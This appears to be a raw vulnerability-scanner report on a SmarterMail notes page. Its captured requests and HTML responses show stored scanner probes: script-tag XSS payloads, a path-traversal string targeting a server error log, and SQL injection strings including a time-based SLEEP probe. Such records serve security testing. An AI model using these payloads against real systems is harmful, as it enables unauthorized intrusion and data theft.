WebForm_AutoFocus('ctl00_MPH_txtNote_SettingText');Sys.Application.initialize();
$(function() { SetTopTitle('My\x20Notes\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
$(function() { $('#ctl00_TPH_TabStrip').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_TabStrip_Tab1":"ctl00_MPH_OptionsTab","ctl00_TPH_TabStrip_Tab2":"ctl00_MPH_CategoriesTab"},"ClientCallbacks":{}}); });
Sys.Application.add_init(function() {if (self.valSwitchTab) self.valSwitchTab();});modules['isPostBack']=true;modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Note","vcID":"ctl00_MPH_txtNote_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},true);});
//]]>
</script>
</form>
</body>
</html>

- /Main/frmNotes.aspx

/Main/frmNotes.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx

Injection Request

GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Identification Request

GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:17:50 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11019
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkdPHNjcmlwdD5ucygweDAwNUNEMSk8L3NjcmlwdD4VAwABIB08c2NyaXB0Pm5zKDB4MDA1Y2QxKTwvc2NyaXB0PhQrAwNnZ2dkZAIGDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwloFgICAQ8WAh4EVGV4dGVkAggPFgIfCWhkAgsPZBYCAgMPZBYCAgEPZBYCZg9kFgICAQ8PFgIfCgUMMTg0NSBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwzN3wwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGSx2MHk102+VgouU7iWTZ/qxhU+vA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">

<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="&lt;script>ns(0x005cd1)&lt;/script>">&lt;script&gt;ns(0x005CD1)&lt;/script&gt;</option>

</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>

<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>

<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>

</div>


<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">


<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NjAxZGY1YWMzOWM1NGYxZGFlMjk5NmE4ZGNhMGNiNzk-" name="ctl00_MPH_HyperGrid1_CB64_NjAxZGY1YWMzOWM1NGYxZGFlMjk5NmE4ZGNhMGNiNzk-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x005DC0)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MWVlOGFlMzNhYmIxNDcxZDhlYjg1YjkyYjYxYWUzZmE-" name="ctl00_MPH_HyperGrid1_CB64_MWVlOGFlMzNhYmIxNDcxZDhlYjg1YjkyYjYxYWUzZmE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">../../../../../CANTBEHERE/../../../../../etc/httpd/logs/error.log</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NGE5YjdmOThjMTBiNDdkNTljZDYwZWYxODRmODFiMzE-" name="ctl00_MPH_HyperGrid1_CB64_NGE5YjdmOThjMTBiNDdkNTljZDYwZWYxODRmODFiMzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">-111 OR SLEEP(25)=0 LIMIT 1-- </td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NWQyYjViYzg2N2RlNDdhZGJlZWRlMTRlZTU3MDM5NGQ-" name="ctl00_MPH_HyperGrid1_CB64_NWQyYjViYzg2N2RlNDdhZGJlZWRlMTRlZTU3MDM5NGQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1 OR X='ss</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWY5Y2Q4YmUwZjIyNDhjNzk0YjhjOTA4MWI1MGU4NmI-" name="ctl00_MPH_HyperGrid1_CB64_ZWY5Y2Q4YmUwZjIyNDhjNzk0YjhjOTA4MWI1MGU4NmI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzQ5YTU4YmIxNDU4NDllNThhNDVmZjczNDIzMTljY2Q-" name="ctl00_MPH_HyperGrid1_CB64_MzQ5YTU4YmIxNDU4NDllNThhNDVmZjczNDIzMTljY2Q-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">' OR '1'='1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTFmMWM3OGJhNGZkNDBkNDljMzBlZjdiNWM5ZTM2ODY-" name="ctl00_MPH_HyperGrid1_CB64_MTFmMWM3OGJhNGZkNDBkNDljMzBlZjdiNWM5ZTM2ODY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">-1 OR 17-7=10</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzNhZDU4NjU1OTRjNGU2NmI2YzgwNGJmZmNhNDdjNTk-" name="ctl00_MPH_HyperGrid1_CB64_YzNhZDU4NjU1OTRjNGU2NmI2YzgwNGJmZmNhNDdjNTk-" /></td><td class="SmallImage"><table class="No..

Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:17:52 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11024
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkdPHNjcmlwdD5ucygweDAwNUNEMSk8L3NjcmlwdD4VAwABIB08c2NyaXB0Pm5zKDB4MDA1Y2QxKTwvc2NyaXB0PhQrAwNnZ2dkZAIGDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwloFgICAQ8WAh4EVGV4dGVkAggPFgIfCWhkAgsPZBYCAgMPZBYCAgEPZBYCZg9kFgICAQ8PFgIfCgUMMTg0NyBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwzN3wwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGRaQf8o8Dinr0O9HuS8vYG2QAioSA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">

<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="&lt;script>ns(0x005cd1)&lt;/script>">&lt;script&gt;ns(0x005CD1)&lt;/script&gt;</option>

</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>

<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>

<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>

</div>


<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">


<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
